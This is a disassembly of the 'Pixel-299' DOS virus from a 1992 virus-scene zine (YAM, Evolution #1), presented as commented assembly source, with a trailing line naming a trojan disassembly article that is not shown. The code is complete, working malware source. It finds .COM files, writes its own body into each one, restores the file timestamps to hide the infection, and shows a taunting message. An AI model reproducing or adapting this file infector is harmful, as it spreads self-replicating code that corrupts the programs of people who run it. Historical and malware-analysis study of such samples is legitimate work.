home *** CD-ROM | disk | FTP | other *** search
-
-
- ;*****************************************************************************
-
- ;
-
- ; Pixel - 299 virus
-
- ;
-
- ; Disassembled By Admiral Bailey [YAM '92]
-
- ;
-
- ; Notes: I dont know where the hell I got this one from but when I found it on
-
- ; one of my disks it was named incorectly. Some Amst shit but I looked
-
- ; it up in the vsum and its named as Pixel so Il use that name.
-
- ; Anyways its just a plain com infecting virus that displays a messege
-
- ; when executed. Nothing big.
-
- ;
-
- ;*****************************************************************************
-
-
-
- data_1e equ 6Ch
-
- data_2e equ 96h
-
- data_3e equ 98h
-
- data_4e equ 9Eh
-
- data_15e equ 12Bh ;*
-
- data_16e equ 12Dh ;*
-
-
-
- seg_a segment byte public
-
- assume cs:seg_a, ds:seg_a
-
-
-
-
-
- org 100h
-
-
-
- Pixel proc far
-
-
-
- start:
-
- jmp short begin
-
- dw 5649h
-
- data_7 db 0
-
- data_8 db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 ; '*.com'
-
- data_10 dw 0, 8918h
-
- data_12 dw 0
-
-
-
- begin: ; loc_1:
-
- push ax
-
- mov ax,cs
-
- add ax,1000h
-
- mov es,ax
-
- inc data_7
-
- mov si,100h
-
- xor di,di ; Zero register
-
- mov cx,12Bh
-
- rep movsb ; Mov [si] to es:[di]
-
- mov dx,offset data_8 ; load the type of file to find
-
- mov cx,6 ; Im not sure what attrib
-
- mov ah,4Eh ; Find first file
-
- int 21h ;
-
-
-
- jc quit ; if none found then...
-
- get_file: ; loc_2
-
- mov dx,data_4e ; file name
-
- mov ax,3D02h ; open file
-
- int 21h
-
-
-
- mov bx,ax
-
- push es
-
- pop ds
-
- mov dx,data_15e ; buffer for read
-
- mov cx,0FFFFh ; number of bytes to read
-
- mov ah,3Fh ; read file
-
- int 21h
-
-
-
- add ax,12Bh
-
- mov cs:data_12,ax
-
- cmp word ptr ds:data_16e,5649h ; probably comparing size
-
- je not_this_file ; of file
-
- xor cx,cx ; Zero register
-
- mov dx,cx
-
- mov ax,4200h ; move file pointer
-
- int 21h
-
-
-
- jc not_this_file ; if error the quit this file
-
- xor dx,dx ; Zero register
-
- mov cx,cs:data_12
-
- mov ah,40h ; write virus to file
-
- int 21h
-
-
-
- mov cx,cs:data_2e ; old date
-
- mov dx,cs:data_3e ; new time
-
- mov ax,5701h ; set files date & time
-
- int 21h
-
-
-
- not_this_file: ; loc_3:
-
- mov ah,3Eh ; close this file
-
- int 21h
-
-
-
- push cs
-
- pop ds
-
- mov ah,4Fh ; find another file
-
- int 21h
-
-
-
- jc quit ; if none found quit
-
- jmp short get_file ; if found then infect
-
- quit: ; loc_4
-
- cmp data_7,5
-
- jb loc_5 ; Jump if below
-
- mov ax,40h
-
- mov ds,ax
-
- mov ax,ds:data_1e
-
- push cs
-
- pop ds
-
- and ax,1
-
- jz loc_5 ; Jump if zero
-
- mov dx,offset data_13 ; gets the messege
-
- mov ah,9 ; display string
-
- int 21h
-
-
-
- int 20h ; Quit program
-
-
-
- data_13 db 'Program sick error:Call doctor o' ; messege
-
- db 'r buy PIXEL for cure description' ; displayed when
-
- db 0Ah, 0Dh, '$' ; run
-
- loc_5:
-
- mov si,offset data_14
-
- mov cx,22h
-
- xor di,di ; Zero register
-
- rep movsb ; Rep when cx >0 Mov [si] to es
-
- pop bx
-
- mov cs:data_10,0
-
- mov word ptr cs:data_10+2,es
-
- jmp dword ptr cs:data_10
-
-
-
- data_14 db 1Eh ; cant figure this
-
- db 07h,0BEh, 2Bh, 02h,0BFh, 00h ; part out...
-
- db 01h,0B9h,0FFh,0FFh, 2Bh,0CEh ; probably infected
-
- db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h ; file before.
-
- db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh
-
- db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh
-
- db 2Eh, 00h, 01h,0CDh ; this is an int 20h
-
- db 20h
-
-
-
- Pixel endp
-
-
-
- seg_a ends
-
-
-
- end start
-
-
-
-
-
- ─────────═════════>>> Article From Evolution #1 - YAM '92
-
-
-
- Article Title: Thrasher Trojan Disassembly
-
- Author: Natas Kaupas
-
-
-
-
-
-
-
-
